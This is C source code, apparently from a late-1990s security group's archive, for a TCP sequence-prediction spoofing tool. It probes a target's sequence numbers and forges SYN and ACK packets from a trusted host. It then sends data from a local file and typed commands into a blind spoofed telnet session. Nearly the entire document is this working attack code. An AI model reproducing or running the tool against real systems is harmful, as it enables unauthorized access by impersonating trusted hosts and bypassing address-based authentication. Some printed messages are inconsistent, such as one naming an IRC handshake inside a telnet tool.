..:-={{Collaborative Security Information Center}}=-:.. X-TREME & TECHNOTRONIC Security Collaboration Project http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com #include "tcpip.c" #include unsigned long sourceport = 1036; unsigned long dest, spoofed, src, nseq, tarport, temp; char str[255], *string; char buf[4096]; char spoofdir[10], *spoofid; char spoofbuf[42]; int len, rec, sen, i=1, adder=128000, stringlen=0; int spooffd, spooflen; struct sockaddr_in addr, spoofedaddr; struct hostent *host; void main(int argc, char *argv[]) { unsigned long fakesequence = 408618+getpid(); sourceport+=getpid(); printf("Telnet sequence - writtin by vect0rx.\n\n"); if (argc != 5) { fprintf(stderr,"Usage: %s {1|2}\n\n",argv[0]); fprintf(stderr," - Site spoof is attempted on.\n"); fprintf(stderr," - Port to access on .\n"); fprintf(stderr," - Host to appear from.\n"); fprintf(stderr," 1 - Offset of 128000 (common).\n"); fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n"); exit(1); } tarport = atoi(argv[2]); if (argv[4][0] == '2') adder=64000; memset(&spoofedaddr,0,sizeof(spoofedaddr)); spoofedaddr.sin_family = AF_INET; if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) { if ((host = gethostbyname(argv[3])) == NULL) { printf("Unknown host %s.\n",argv[3]); exit(1); } spoofedaddr.sin_family = host->h_addrtype; memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length); } memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4); memset(&addr,0,sizeof(addr)); addr.sin_family = AF_INET; if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { if ((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host %s.\n",argv[1]); exit(1); } addr.sin_family = host->h_addrtype; memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length); } memcpy(&dest,(char *)&addr.sin_addr.s_addr,4); if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("error: recv socket"); exit(1); } if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: send socket"); exit(1); } sen = openintf("ppp0"); #ifdef IP_HDRINCL fprintf(stderr,"IP_HDRINCL is set\n"); if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #endif gethostname(buf, 128); if ((host=gethostbyname(buf))==NULL) { fprintf(stderr, "Can't get my hostname!?\n"); exit(1); } memcpy(&src,host->h_addr,4); sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0); for (;;) { gettcppacket(rec,buf,sizeof(buf)); ip = (struct iphdr *) buf; if (ip->saddr != dest) continue; len = ip->ihl << 2; tcp = (struct tcphdr *) (buf+len); if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) { temp=htonl(tcp->th_seq); nseq=temp; nseq+=adder; printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder); sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0); break; /* out of for loop */ } } sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport, tarport,fakesequence,0,NULL,0); printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout); usleep(10000); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport, tarport,++fakesequence,++nseq,NULL,0); printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout); usleep(5000); printf("Sending irc client handshake.\n"); fflush(stdout); strcat(spoofdir, "./telnet.d"); spooffd = open(spoofdir, O_RDONLY); if (spooffd < 0) { perror("open: "); exit(0); } else { spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf)); spoofid = strtok(spoofbuf, "\r\n"); } stringlen = strlen(spoofid); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,spoofid,stringlen); fakesequence+=stringlen; for(;;) { printf("telnet:%s> ", argv[1]); fflush(stdout); string = fgets(str, 255, stdin); stringlen = strlen(string); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,string,stringlen); fakesequence+=stringlen; } } /* */